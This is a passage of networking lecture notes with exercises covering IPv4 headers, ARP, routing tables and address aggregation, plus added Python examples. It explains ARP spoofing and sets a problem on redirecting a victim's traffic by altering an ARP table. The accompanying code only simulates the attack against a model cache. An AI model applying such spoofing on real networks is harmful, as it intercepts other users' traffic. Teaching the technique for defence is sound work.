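PROTOCOL_NAMES = {1: "ICMP", 6: "TCP", 17: "UDP"}   # example's own lookup table


@dataclass
class IPv4Header:
    version: int
    header_len: int        # HLEN * 4, in bytes (20..60)
    tos: int
    total_length: int      # header + data, in bytes
    identification: int
    dont_fragment: bool
    more_fragments: bool
    fragment_offset: int   # in 8-byte units
    ttl: int
    protocol: int
    checksum: int          # the value carried in the header
    checksum_ok: bool      # does the header verify?
    src: str
    dst: str
    options: bytes

    @property
    def data_length(self) -> int:
        return self.total_length - self.header_len

    @property
    def protocol_name(self) -> str:
        return PROTOCOL_NAMES.get(self.protocol, str(self.protocol))


def dotted(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def header_checksum(header: bytes) -> int:
    """Checksum for a header whose checksum field (bytes 10-11) is zeroed."""
    return (~ones_complement_sum(header)) & 0xFFFF


def parse_ipv4_header(packet: bytes) -> IPv4Header:
    """Decode the header at the start of `packet`; reject malformed ones."""
    if len(packet) < 20:
        raise ValueError("truncated: an IPv4 header is at least 20 bytes")
    version, ihl = packet[0] >> 4, packet[0] & 0x0F
    if version != 4:
        raise ValueError(f"not IPv4 (version nibble is {version})")
    header_len = ihl * 4
    if ihl < 5 or len(packet) < header_len:
        raise ValueError(f"bad HLEN {ihl}: header claims {header_len} bytes")
    (_, tos, total_length, ident, flags_frag, ttl, proto, csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    if total_length < header_len:
        raise ValueError("total length is smaller than the header")
    header = packet[:header_len]
    # Summing the whole header, stored checksum included, gives 0xFFFF when intact.
    checksum_ok = ones_complement_sum(header) == 0xFFFF
    return IPv4Header(
        version=version, header_len=header_len, tos=tos,
        total_length=total_length, identification=ident,
        dont_fragment=bool(flags_frag & 0x4000),
        more_fragments=bool(flags_frag & 0x2000),
        fragment_offset=flags_frag & 0x1FFF,
        ttl=ttl, protocol=proto, checksum=csum, checksum_ok=checksum_ok,
        src=dotted(src), dst=dotted(dst), options=header[20:])


def forward_one_hop(packet: bytes) -> Optional[bytes]:
    """A router's work on the header: decrement TTL, drop at zero, fix checksum."""
    hdr = parse_ipv4_header(packet)
    if not hdr.checksum_ok or hdr.ttl <= 1:
        return None                  # corrupted, or TTL expires here: discarded
    out = bytearray(packet)
    out[8] -= 1                      # TTL is byte 8 of the header
    out[10:12] = b"\x00\x00"         # zero the checksum field, then recompute it
    out[10:12] = struct.pack("!H", header_checksum(bytes(out[:hdr.header_len])))
    return bytes(out)


if __name__ == "__main__":
    pkt = bytes.fromhex(EXERCISE_HEADER_HEX)
    print(parse_ipv4_header(pkt))
    print(parse_ipv4_header(forward_one_hop(pkt)))
```

Two things worth noticing when you run it. First, every field a sniffer needs (both addresses, the protocol, the lengths) is in the clear, which is why the metadata questions above are answerable at all; here the TCP payload happens to begin with the bytes 17 03 01, a TLS record header, so the contents are encrypted while the addresses are not. Second, the checksum changes at every hop (0x2c04 becomes 0x2d04 after one TTL decrement) and a router recomputes it for free, so a header that "passes the checksum" tells you it was not mangled by the wire, not that it is the header the sender wrote.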
The next hexadecimal number (5) indicates the length of the IP packet's header in units of 4 bytes.

Question 11. How many bytes are in the header of this IP packet?
Question 12. Does your answer to Question 11 match the data provided in the Packet Details pane?
Question 13. Write down the hexadecimal numbers that correspond to the Total Length.
Question 14. Write out the hexadecimal numbers in Question 13 as a binary number.
Question 15. Convert the binary number in Question 14 to a decimal (base 10) number.

The Total Length entry gives the size of the IP packet in bytes.

Question 16. Does the number you calculated in Question 15 match the data provided in the Packet Details pane?

Is translating these hexadecimal numbers to decimal, and interpreting them, fun? Probably not, even for Computer Engineering students. This data at the bottom is called the "raw hex" or the "hex dump." There was a time when this was what we "saw" when we used a packet sniffer. One of the nice things about Wireshark is that it provides a translation of the hex dump, and so we will usually not have to pay attention to the bottom pane. The bottom pane is what has actually been sniffed…remember, everything is bits!

Note that at the right of the hex dump, we see what looks like gibberish. This represents the ASCII translation of what is in the hex dump. Since most of these hex values are not intended to be ASCII characters, the result looks like random characters. (Note that a nonprintable ASCII character is shown as a period.) Every so often, though, we will be able to see usable text in this field. For example: Look at packet 136, which is a DNS request.

Question 17. Looking at the bottom pane (the "raw" hex dump), what name do you suppose the user is requesting the IP address for?

Notice that this info is also available in the middle pane. The info in the middle pane is an attempt to provide a high-level best-guess snapshot of the packet.

Look at frame #4955.

Question 18.
What is the source IP address?
Question 19. What is the meaning of this source IP address?

Security Exercise 13 Answer Sheet
Name:
Question 1:  Question 2: (a) (b) (c) (d)  Question 3:  Question 4:  Question 5:  Question 6:  Question 7:  Question 8:  Question 9:  Question 10:  Question 11:  Question 12:  Question 13:  Question 14:  Question 15:  Question 16:  Question 17:  Question 18:  Question 19:

Chapter 14: Routing Part I

Objectives:
(a) State the purpose of the Address Resolution Protocol and describe its role in facilitating communication.
(b) Describe the mechanism for spoofing an ARP cache with misinformation.
(c) Describe how routing works at the network layer.
(d) Construct an optimal routing table for a router given a network diagram and using address aggregation.
(e) Describe how to make a routing decision based on the longest mask matching principle given a network diagram and a destination IP address.

If you find the above cartoon outlandish, wait till you read this: http://www.thefiscaltimes.com/Articles/2013/10/08/2-Billion-NSA-Spy-Center-Going-Flames

I. Address Resolution

We mentioned that for an internet to work effectively, we must have an agreed-upon global addressing scheme. In the last lecture, we discussed the addressing scheme used by the Internet Protocol, and mentioned how it is employed to make a group of different networks appear to be a single network. This global address is the IP address. Thus, from the lofty perspective of the network layer, everyone using the network can be identified by their IP address, and everyone using the network can interpret IP packets.

But… Wait a minute… Different physical networks do in fact exist. When sending data, the software at the network layer works with IP addresses but, unfortunately, the data link layer and the physical layer hardware do not speak IP; i.e., the physical and data link layers do not understand IP addresses or IP packets.
To be clear: A data link frame must use the frame format and addressing scheme for the specific technology or product in use. Ethernet, for example, only understands 48-bit Ethernet addresses properly packaged within Ethernet frames. Put another way: If we were somehow to place an IP packet directly over Ethernet, the Ethernet protocol would not know what to make of it. So, IP addresses must be translated to data link layer addresses before a frame can be sent. And the IP packet itself must be placed (encapsulated) within the data field of the Ethernet frame. Translating from an IP address to a hardware address is called address resolution.

1. Address Resolution Schemes. Two address resolution techniques exist:

A. Table Look-up. A network administrator could set up a table that provides the IP address to data link layer address associations (one column for the IP address, one for the data link layer address). When the software has an IP address and needs to determine the corresponding data-link address, it consults the table. Unfortunately, if you ask a network administrator to maintain such a table for a large, complex and dynamic network, they will want to kill you.

B. Message Exchange. Consider this scheme instead: A computer that needs to translate an IP address to a data-link address sends a message requesting this information. This request essentially says: "I want to send data to the user with IP address x; does anyone know the data-link layer address of the user with IP address x?" We presume that each user knows their own Ethernet address and their own IP address. Another computer replies with the correct association. This reply essentially says: "The user with IP address x has data link address y." The respondent providing the correct association can be the target computer (the computer that owns the IP address x) or a server that stores the full network association table. This technique is used by the Internet's Address Resolution Protocol.

2.
The Address Resolution Protocol (ARP)

The Address Resolution Protocol (ARP) has two message types:
A request message containing an IP address for which we want a data link layer address. An ARP request is broadcast to all computers on the network.
A response message, which contains the IP address and the matching data link layer address. Only the computer that corresponds to the IP address sends a response with its data link layer address. The response is not broadcast; it is sent addressed only to the user that sent the request.

The main use of ARP is to associate a logical software address with a hardware address; that is, to find the hardware address of a node when its IP address is known. Since these days most hardware addresses are Ethernet addresses, ARP finds most use in associating 32-bit IP addresses with 48-bit Ethernet addresses.

Let's refine the pictures above, in terms of ARP. Suppose we have a network with User A, User B and three other unnamed users. User A wants to send a packet to a user with IP address 142.33.68.23. To send the information, User A must learn the Ethernet address for the user with IP address 142.33.68.23. User A sends an ARP request to all users in the local network.

Practice Problem 14.1 How can an ARP request be sent to all users in the local network?
Solution:

This ARP request is received by all users. Each of the users examines the IP address in the ARP request to see if it matches their IP address. Let's say that User B has IP address 142.33.68.23. User B (and only User B) would send an ARP reply containing his Ethernet address. This reply is not broadcast; it is sent in a frame addressed to User A's Ethernet address. Note that ARP allows the seamless addition of new hosts while avoiding the need for a centralized database containing IP address to Ethernet address pairings.

3. ARP Caching

Most computer network communication involves a series of packet exchanges. During the first exchange, a host learns the target host's Ethernet address.
But what does it do for the second exchange? Suppose, in the picture above, that User A has to send more data to IP address 142.33.68.23 a moment after the first exchange. It would be wasteful to have to go through the whole ARP Request/ARP Reply rigmarole all over again. To avoid excess ARP traffic, each user maintains a table of recently received IP address–Ethernet address associations, called an ARP cache. In the example above, User A would make the following entry in its ARP cache:

142.33.68.23 : 23:ef:40:7d:45:77

Before sending an ARP request, a user first checks its ARP cache to see if it already has the Ethernet address that it needs (i.e., the Ethernet address for a specific IP address). ARP table entries can become incorrect without warning. For this reason, each entry in the ARP cache has a timer associated with it. When the timer expires, the entry is deleted from the cache. A typical value for this timeout is 10 minutes.

Practice Problem 14.2 The Address Resolution Protocol works at which two layers?
Solution:

4. ARP Packet

An ARP request is encapsulated in an Ethernet frame as shown below (Figure 21.3, Encapsulation of ARP packet; Forouzan, Data Communications and Networking, McGraw Hill, 2007). This frame is identified as an ARP packet by a specific entry in the Ethernet frame's Type field. The ARP packet format is shown below (Figure 21.2, ARP message; Forouzan, Data Communications and Networking, McGraw Hill, 2007).

Practice Problem 14.3 How many bytes are in an ARP Request packet? How many bytes are in an ARP Reply packet?
Solution:

Several of the fields in the ARP Request and ARP Reply will always be the same. The first field is the hardware type: for Ethernet, this will always be 1.
The second field is the network layer protocol type: for IP this is always 0800 (hexadecimal). The third field is the length of the hardware address in bytes: for Ethernet, this will be 6. The fourth field is the length of the network layer protocol address in bytes: for IP this is always 4. An ARP Request is differentiated from an ARP Reply by the entry in the Operation field: a 1 is placed in this field for ARP Request packets, and a 2 is placed in this field for ARP Reply packets.

Let's look at an example in gory detail. Suppose, in the picture below, User A has IP address N1 and Ethernet address L1 and that User B has IP address N2 and Ethernet address L2.

Suppose User A wants to send important information to his friend, who he happens to know has IP address N2. But User A does not know the proper Ethernet address. (Recall that User A cannot just put his information in an IP packet and transmit the IP packet. User B's network interface card (NIC) expects to see an Ethernet frame. It will not know what to make of an IP packet.) User A would encapsulate an ARP request inside an Ethernet frame as shown below.

Note that in the picture above, the letter M is used to denote the Ethernet broadcast address FF:FF:FF:FF:FF:FF. The broadcast address is placed in the field for the destination address in the Ethernet frame. Thus all other users—User B, User X, User Y and User Z—will receive this frame and pass it up to the network layer for examination.

Note that User A has included his own Ethernet address and IP address (L1 and N1) in the ARP request message. Why would he do this, if his goal is simply to determine the Ethernet address for the user with IP address N2? The reason is this: If User A needs to send data to User B, it will very often mean that User B will have to send data to User A soon thereafter. Most data exchanges are, after all, interactive. Thus, User B will likely need to know User A's IP address–Ethernet address association.
To save User B the trouble of having to send her own ARP request (for A's information) in the future, User A includes its IP address–Ethernet address pairing in its request for B's information. Notice that all hosts on the network immediately learn the IP address–Ethernet address association for User A. Thus all users make the following entry in their ARP cache:

N1 : L1

Now, User B recognizes that the target IP address in the ARP Request is her IP address. Thus, it is User B's Ethernet address that is being requested. So User B will craft an ARP Reply packet as shown below (the figure shows the reply carrying sender addresses L2 and N2 and target addresses L1 and N1, in an Ethernet frame from L2 to L1). To complete the story: After User A receives the ARP Reply from User B, User A will send the IP packet to User B by placing the IP packet in the data field of an Ethernet frame.

Practice Problem 14.4 In the protocol layering model of TCP/IP, how is a host identified:
(a) At the Network Layer
(b) At the Data Link Layer
Solution:

Practice Problem 14.5 What are the two types of messages used by the Address Resolution Protocol?
Solution:

Practice Problem 14.6 When a sender wants to find out what MAC address corresponds to an IP address, to which MAC address would she send an ARP request? (Circle the appropriate answer(s))
(a) 0.0.0.0
(b) ff:ff:ff:ff:ff:ff
(c) 255.255.255.255
(d) 00:00:00:00:00:00
Solution:

Practice Problem 14.7 Can an ARP Reply be sent without an ARP request?
Solution:

5. ARP Spoofing

A major flaw with ARP is that an ARP Reply message can be sent without a preceding ARP Request. To see what problems might ensue, consider again our local network, for which we now know User A's and User B's IP address and Ethernet address pairings. We also indicate the IP address–Ethernet address pairing for User X, who is actually the Evil User! Suppose User X (Evil User) sends an ARP Reply that, for practical purposes, says: IP address N2 is paired with Ethernet address L3. Notice that this ARP Reply is not preceded by an ARP Request from any user.
Nevertheless, all other users—trusting souls that they are—will update their ARP cache with the entry:

N2 : L3

Note that this pairing is not correct: the correct Ethernet address for User B (who has IP address N2) is L2, not L3. So…why would the Evil User have sent this bad gouge to all users on this local network, corrupting everyone's ARP cache? He did this because he's EVIL! [24]

Suppose User A now wants to send an IP packet to his friend (User B) with IP address N2. User A will check his ARP cache and see that the packet should be encapsulated in an Ethernet frame addressed to … L3 (Evil User). Thus the IP packet intended for User B will instead be delivered to the Evil User.

Sending an ARP Reply with an incorrect IP address–Ethernet address pairing with the intent to misdirect traffic is termed ARP spoofing. If an attacker with Ethernet address [Attacker's Ethernet Address] wants to steal traffic from a user with IP address [Victim's IP address], he sends an ARP Reply saying: IP address [Victim's IP address] is associated with Ethernet address [Attacker's Ethernet Address].

Practice Problem 14.8 One of your crewmembers has downloaded ARP-spoofing software.
(a) What does ARP spoofing software do?
(b) What is one malevolent purpose he could use this for?
Solution:

II. Sending IP Packets to Users on Your Own Network

If a destination IP address is in our same network, we directly deliver the IP packet. This is called, shockingly, direct delivery. In direct delivery, the destination is on the same network as the sender. No routers are involved as intermediaries. How does the sender know the destination is on the same network? The IP addresses of all machines on a single network will have the same network ID. So, the sender looks at the destination's network ID. Thus, a host can easily see if another host is directly connected. How do we route to other hosts on the same network? Simple!
The sender encapsulates the datagram in a data link frame, binds the destination IP address to a physical hardware address, and sends the resulting frame directly to the destination.

Practice Problem 14.9 Your IP address is 10.16.58.92/27. Can you use direct delivery to send messages to the host 10.16.58.129?
Solution:

Practice Problem 14.10 Your IP address is 10.226.58.15/24. Could you use direct delivery to send messages to the host 10.226.58.229?
Solution:

Footnote 24: Note that an ARP reply, when properly used, is always sent to an individual user. Malicious ARP replies can be sent to the broadcast address.

III. Routing

If the destination IP address is not in our same network (i.e., if it does not have the same network ID), we cannot directly deliver the IP packet. We must route the IP packet using routers: The source computer sends the IP packet to the first router, which passes the IP packet to the next router, and so forth, until the final router delivers the IP packet to the destination. Routers operate at the network layer; indeed, one of the key network layer functions is routing: choosing an appropriate path for packet flow. (Figure from Forouzan, Data Communications and Networking, McGraw Hill, 2007.)

1. Routing Tables

We route IP packets by using a routing table, which must (somehow) convey the route to the final destination. Each entity—host or router—maintains an IP routing table which provides information on how to reach possible destinations. A host or router consults a routing table when making routing decisions.

Consider this naive proposal for the use of a routing table: Maintain in each entity a routing table which lists every possible destination IP address, and the full path needed from the entity to reach each possible destination.
In this scheme, a routing table might have billions of entries (since there might be billions of IP addresses in use at any time), and each of these entries would have multiple pieces of data associated with it (the full route to the destination for this entry in the table). This approach is not practical; the resulting routing tables would be gargantuan. Think of how slow routing would be if the decision on where to send each and every packet required consultation with a table of billions of entries. Moreover, think of the problem of constantly updating these huge tables as IP addresses are reassigned to different hosts throughout the Internet. So, early on, three clever ideas were employed to make routing tables as small as possible.

First clever idea: For each destination IP address, only store in the routing table the IP address of the next hop.

Consider the small network below (Figure 22.2, Route method versus next-hop method), which shows three networks interconnected with two routers: R1 and R2. Each of the three networks has many hosts connected to it, but, for simplicity, we only show two hosts: Host A and Host B. Let's consider the routing table for Host A, and, in particular, let's look at the entry for Host B. Originally, the entry for Host B would have been the full path, as shown in the figure. This entry means: To reach Host B, send the packet to router R1, who will in turn send it to router R2, who will then send it to Host B.

The first clever idea recognizes that a host or router does not need to maintain information in its routing table about the full path to a destination. Host A's routing table entry for Host B can be reduced to just the next hop, router R1. Router R1 will have its own routing table that will tell it that the next hop for destination Host B is router R2. R2 will have its own routing table that will tell it that the next hop for destination Host B is direct delivery to Host B.
Second clever idea: Instead of having routing table entries for each and every destination host, store routing table entries for destination networks.

Consider the network below, which shows a portion of the routing table for Host A. Note that Host A has entries for Hosts B, C and D. Note that all three of these hosts (B, C and D) are on the same network (Network 2). All packets delivered to these three hosts will be delivered to the same network. Thus, we can collapse the three entries for B, C and D into a single entry in the routing table. All entities that connect to the same physical network share a common prefix (the network ID). Thus, routing tables only need to contain network prefixes, and not complete IP addresses. Routing decisions are then made by table lookup, where the routing table keeps only the network portion of the IP addresses (so the size of the routing table is, at worst, proportional to the number of networks, not the number of hosts).

Third clever idea: Default routing. To avoid large routing tables, group multiple destinations into a single default case. That is, when we want to route a packet, we first check to see if the destination network ID is in the routing table; if not, we send the packet to the default router.

Consider Host A in the network below: We see that Host A has a connection to Network 2 via router R1, and a connection to the rest of the world via router R2. It would make sense for Host A to have an entry in its routing table for Network 2. But it would make no sense for Host A to have entries for any other specific networks, since any destination other than Network 2 will always be routed via router R2. So, by default, if the destination is not Network 2, we should send the packet to R2. Default routing is most useful when a host has a single connection to the Internet. Then routing is easy: If the destination's network ID does not match mine, send the packet to the default router.
Summary

So, let's summarize the decisions that are made in routing, and show the form of the routing table (Figure 22.5, Simplified forwarding module in classless addressing; Forouzan).

Step 1. A packet shows up at a router X, needing to be routed to its final destination.

Step 2. Router X examines the destination's IP address and extracts the network address. In order to extract the network address, the routing table for each network address must have the associated mask. So, a column for the mask is included as the first column in the routing table for Router X, shown below. Router X applies the mask in the first line of the table to the destination IP address and checks to see if the extracted network ID matches the Network address shown on the first line. If it matches … Joy! … send the packet to the Next-hop address which is on this Interface. If it does not match, repeat the process for the second line of the routing table.

Practice Problem 14.11 (Figure 22.6, Configuration for Example 22.1; based on an example in Forouzan, Data Communications and Networking, McGraw Hill.) The router R1 in the figure below connects the four different networks shown. The four networks connect to the router's four interfaces, labeled m0, m1, m2 and m3. (Among the figure's labels are the network 180.70.65.128/26 and the interface address 180.70.65.135/26.)

(a) Why does the router R1 have 4 different IP addresses?
Solution:
(b) How would you verify that the router address 180.70.65.135/26 on the m0 interface is indeed on the network 180.70.65.128/26?
Solution:
(c) Your friend says: "Wait just a minute! The two different networks 180.70.65.128/26 and 180.70.65.192/26 look very similar. Are these really two different networks…i.e., are these really two nonoverlapping blocks of addresses?" How would you reply?
Solution:
(d) Construct the routing table.
(Table 22.1, Routing table for router R1 in Figure 22.6.) We will see later that it is best to order the table by decreasing mask value…but let's proceed.

(e) Suppose an IP packet with destination IP address 180.70.65.140 arrives at router R1. Explain how the routing table is used to make a routing decision.
Solution:
(f) Suppose an IP packet with destination IP address 201.4.22.35 arrives at router R1. What does it do?
Solution:

2. Address Aggregation

Consider the network below (Figure 22.7, Address aggregation; from Forouzan, Data Communications and Networking, McGraw Hill, 2007), examining also the routing table for router R2. In that table, the four network entries all have next hop R1 on interface m0, and one further entry uses interface m1. Notice that the four addresses are disposed of in the same way: place on interface m0. Let's look at just the last octet of these four network addresses:

140.24.7.0    last octet: 0 0 0 0 0 0 0 0
140.24.7.64   last octet: 0 1 0 0 0 0 0 0
140.24.7.128  last octet: 1 0 0 0 0 0 0 0
140.24.7.192  last octet: 1 1 0 0 0 0 0 0

Note that the first two bits in this fourth octet are part of the mask (which is /26). But examine these two bits carefully! Any value of these two bits (00, 01, 10, 11) yields the same result: Send it out on interface m0. Since the values of these two bits do not need to be considered (they can take on any of the four possibilities while yielding the same routing decision), we can move the mask up to /24 and consolidate these four entries on a single line: 140.24.7.0/24, next hop R1, interface m0.

Practice Problem 14.12 Given the following diagram: Use the technique of address aggregation to create the routing table for Router R2 with the minimum number of entries.
Solution:

3. Longest Mask Matching

Let's consider now the following network previously referenced, where Organization 4 has split off while keeping its IP address block and is accessed now via router R3.
(Figure 22.8, Longest mask matching; Forouzan, Data Communications and Networking, McGraw Hill, 2007.) Router R2 has a routing table, pictured below, in which address aggregation has been applied to the networks of Organization 1, Organization 2 and Organization 3; these are now listed under mask /24 with next hop R1, and Organization 4's block is listed with next hop R3.

Suppose a packet with destination address 140.24.7.200 arrives at router R2. (It is left as an exercise for the student to show that address 140.24.7.200 belongs to network 140.24.7.192/26.) What happens? By applying the masks in the order listed in the routing table for R2, we see the IP packet is routed to the wrong location – to router R1. How can we fix this problem?

To prevent this problem, routing tables are sorted from longest mask to shortest mask. This principle is called longest mask matching. So the corrected routing table for R2 would list the /26 entry for Organization 4 (next hop R3) before the /24 entry (next hop R1).

Problems

1. Given the following ARP table, make the necessary change(s) to cause all Ethernet traffic destined for 192.168.14.10 to flow to you (192.168.14.13) instead.

IP              MAC
192.168.14.8    AA:BB:CC:DD:EE:FF
192.168.14.9    AA:BB:AA:BB:AA:BB
192.168.14.10   CC:DD:CC:DD:CC:DD
192.168.14.12   EE:FF:EE:FF:EE:FF
192.168.14.13   A4:B5:C6:D7:E8:F9
192.168.14.21   C6:D7:C6:D7:C6:D7
192.168.14.25   E8:F9:E8:F9:E8:F9

2. Why is the destination hardware address field of an ARP request message filled with all zeroes?
3. Why is an ARP request message sent to the broadcast hardware address?
4. Combine these three blocks of addresses into a single block: 18.45.24.0/26, 18.45.24.64/26, 18.45.24.128/25
5. Construct the routing table for router RB in the picture shown below.
6. Suppose router RB in Problem 5 receives a packet with a destination address 3.3.3.38. Explain how the router uses its routing table to decide where to send this packet.
7. What feature of the Address Resolution Protocol makes it particularly vulnerable to a spoofing attack?
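As an added example for Sections 3, 4 and 5 of this chapter (the ARP cache, the ARP packet, and the unsolicited reply that ARP spoofing relies on), not part of the original notes: the Python below builds and parses the 28-byte ARP message, keeps a cache with the 10-minute timeout, and replays the User A / User B / User X story twice, once with the trusting behaviour the notes describe and once with a cache that only accepts replies it asked for. User A's IP address and the MAC addresses of Users A and X are made-up values.

```python
import struct

HTYPE_ETHERNET = 1          # ARP hardware type for Ethernet
PTYPE_IPV4 = 0x0800         # ARP protocol type for IP
OP_REQUEST, OP_REPLY = 1, 2
ZERO_MAC = "00:00:00:00:00:00"   # target hardware address in a request
CACHE_TIMEOUT = 600.0       # seconds: the typical 10-minute entry lifetime

# Constructed addresses for the Users of the notes (N1, L1 and L3 are assumed values).
N1, L1 = "142.33.68.10", "00:1a:2b:3c:4d:01"   # User A
N2, L2 = "142.33.68.23", "23:ef:40:7d:45:77"   # User B (pairing from the notes)
L3 = "00:1a:2b:3c:4d:03"                       # User X, the Evil User


def mac_to_bytes(mac): return bytes.fromhex(mac.replace(":", ""))
def ip_to_bytes(ip): return bytes(int(o) for o in ip.split("."))
def bytes_to_mac(b): return ":".join(f"{x:02x}" for x in b)
def bytes_to_ip(b): return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """The 28-byte ARP message: htype, ptype, hlen, plen, op, then four addresses."""
    return (struct.pack("!HHBBH", HTYPE_ETHERNET, PTYPE_IPV4, 6, 4, op)
            + mac_to_bytes(sender_mac) + ip_to_bytes(sender_ip)
            + mac_to_bytes(target_mac) + ip_to_bytes(target_ip))


def parse_arp(data):
    """Decode an ARP message, rejecting anything that is not Ethernet/IPv4 ARP."""
    if len(data) < 28:
        raise ValueError("ARP message too short")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", data[:8])
    if (htype, ptype, hlen, plen) != (HTYPE_ETHERNET, PTYPE_IPV4, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol types")
    return {"op": op,
            "sender_mac": bytes_to_mac(data[8:14]), "sender_ip": bytes_to_ip(data[14:18]),
            "target_mac": bytes_to_mac(data[18:24]), "target_ip": bytes_to_ip(data[24:28])}


class ArpCache:
    """One host's ARP cache. strict=False is the trusting behaviour the notes describe;
    strict=True accepts only replies it asked for and flags attempts to rebind an IP."""

    def __init__(self, strict=False, timeout=CACHE_TIMEOUT):
        self.strict = strict
        self.timeout = timeout
        self.entries = {}      # ip -> (mac, time learned)
        self.pending = set()   # IPs for which we have an outstanding request
        self.alerts = []       # records of suspicious replies (strict mode only)

    def lookup(self, ip, now):
        entry = self.entries.get(ip)
        if entry is None:
            return None
        mac, learned = entry
        if now - learned > self.timeout:   # timer expired: drop the entry
            del self.entries[ip]
            return None
        return mac

    def send_request(self, ip):
        self.pending.add(ip)

    def receive(self, packet, now):
        arp = parse_arp(packet)
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if arp["op"] == OP_REQUEST:
            # Every host learns the requester's pairing from the broadcast request.
            self.entries[ip] = (mac, now)
            return "learned-from-request"
        if self.strict:
            if ip not in self.pending:
                self.alerts.append(f"unsolicited ARP reply: {ip} claimed by {mac}")
                return "ignored-unsolicited"
            old = self.lookup(ip, now)
            if old is not None and old != mac:
                self.alerts.append(f"ARP reply rebinds {ip}: {old} -> {mac}")
                return "ignored-rebinding"
        self.pending.discard(ip)
        self.entries[ip] = (mac, now)
        return "learned-from-reply"


def replay_story(strict):
    """User A asks for N2, User B answers, then User X sends an unsolicited reply
    claiming N2 is at L3. Returns A's cache afterwards."""
    cache = ArpCache(strict=strict)
    cache.send_request(N2)                                   # A broadcasts its request
    cache.receive(build_arp(OP_REPLY, L2, N2, L1, N1), 1.0)  # B's unicast reply
    cache.receive(build_arp(OP_REPLY, L3, N2, L1, N1), 2.0)  # X's spoofed reply
    return cache


if __name__ == "__main__":
    for strict in (False, True):
        c = replay_story(strict)
        print(f"strict={strict}: N2 -> {c.lookup(N2, 3.0)}  alerts={c.alerts}")
```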
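As an added example for Part III (routing tables, address aggregation and longest mask matching) and for Problems 4 to 6, not from the original notes: the Python below performs the mask-and-compare table lookup described in the Summary, merges sibling blocks the way address aggregation does, and shows why router R2 sends 140.24.7.200 to R1 instead of R3 unless its table is sorted longest mask first. The interface names on R2 and its default route are assumptions; the direct-delivery check reuses the addresses of Practice Problems 14.9 and 14.10.

```python
def ip_to_int(ip):
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"invalid dotted-decimal address: {ip}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def int_to_ip(n):
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def mask_of(prefix):
    """/prefix as a 32-bit mask; /0 is the all-zero mask used by a default route."""
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF if prefix else 0


def parse_cidr(text):
    """'140.24.7.64/26' -> (network id as an int, prefix length)."""
    ip, prefix = text.split("/")
    prefix = int(prefix)
    return ip_to_int(ip) & mask_of(prefix), prefix


def same_network(my_cidr, other_ip):
    """Direct delivery test: does the destination share my network ID?"""
    net, prefix = parse_cidr(my_cidr)
    return ip_to_int(other_ip) & mask_of(prefix) == net


class RoutingTable:
    """Rows of (mask, network address, next hop, interface), searched top to bottom."""

    def __init__(self, entries, longest_mask_first=True):
        self.rows = []
        for cidr, hop, iface in entries:
            net, prefix = parse_cidr(cidr)
            self.rows.append((prefix, net, hop, iface))
        if longest_mask_first:   # stable sort keeps the listed order among equal masks
            self.rows.sort(key=lambda row: row[0], reverse=True)

    def route(self, dest_ip):
        dest = ip_to_int(dest_ip)
        for prefix, net, hop, iface in self.rows:
            if dest & mask_of(prefix) == net:   # apply the mask, compare to the network
                return hop, iface
        return None                             # nothing matched and no default route


def aggregate(cidrs):
    """Merge sibling blocks (same prefix, aligned, adjacent) until nothing merges."""
    blocks = sorted(set(parse_cidr(c) for c in cidrs))
    merged = True
    while merged:
        merged, out, i = False, [], 0
        while i < len(blocks):
            net, prefix = blocks[i]
            if i + 1 < len(blocks) and prefix > 0:
                net2, prefix2 = blocks[i + 1]
                size = 1 << (32 - prefix)
                if prefix2 == prefix and net % (2 * size) == 0 and net2 == net + size:
                    out.append((net, prefix - 1))   # the two halves become one block
                    merged, i = True, i + 2
                    continue
            out.append((net, prefix))
            i += 1
        blocks = out
    return [f"{int_to_ip(net)}/{prefix}" for net, prefix in blocks]


# Router R2 of the longest-mask-matching section: Organizations 1 to 3 aggregated to a
# /24 via R1, Organization 4 (140.24.7.192/26) via R3. Interfaces and default are assumed.
R2_ENTRIES = [
    ("140.24.7.0/24", "R1", "m0"),
    ("140.24.7.192/26", "R3", "m1"),
    ("0.0.0.0/0", "default router", "m2"),
]

if __name__ == "__main__":
    print(aggregate(["140.24.7.0/26", "140.24.7.64/26",
                     "140.24.7.128/26", "140.24.7.192/26"]))
    as_listed = RoutingTable(R2_ENTRIES, longest_mask_first=False)
    sorted_table = RoutingTable(R2_ENTRIES)
    print("as listed:", as_listed.route("140.24.7.200"))            # wrong: R1
    print("longest mask first:", sorted_table.route("140.24.7.200"))  # right: R3
```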
Security Exercise 14

Part I: The Geography of the Internet

At this point you should appreciate that the Internet is, to a great extent, a large collection of routers along with the interconnecting media (copper wires, fiber optic cables, and, as we will see later in the course, wireless links). We have talked about the Internet (its routers, its interconnecting media) within the confines of the lecture notes and within the confines of mathematical algorithms. Which may leave you wondering: Where is the Internet physically? And what does it look like geographically?

The original vision for the Internet was that it would be a small enterprise, and would appear somewhat flat: each router would be just as important as any other router. The original intent was that the network would be fully distributed and decentralized so that it could survive a nuclear war. Stated another way, the original intent was that the Internet would have no routers serving as choke points that could serve as single points of failure. If—the theory went—every router is connected to the same number of other routers, then every router is equally unimportant to the survival of the Internet. So, with this vision in mind, we might expect the number of "routers per square mile" to be roughly the same everywhere.

This is not how things turned out, to say the least. The Internet has, in fact, physical focal points—single buildings where a large number of routers are collocated—single buildings through which a large amount of the Internet's traffic funnels. To see how this came about, let's go waaaaaay back to 1980. A USNA grad was President, disco was dying out, and the Internet (then called the ARPANET) looked like this:

In 1980 the listing of everyone on the Internet totaled 5000 names. These were names, not computers. The number of computers with Internet access was far fewer. In the mid-1980s the Internet (i.e., ARPANET) shifted to TCP/IP.
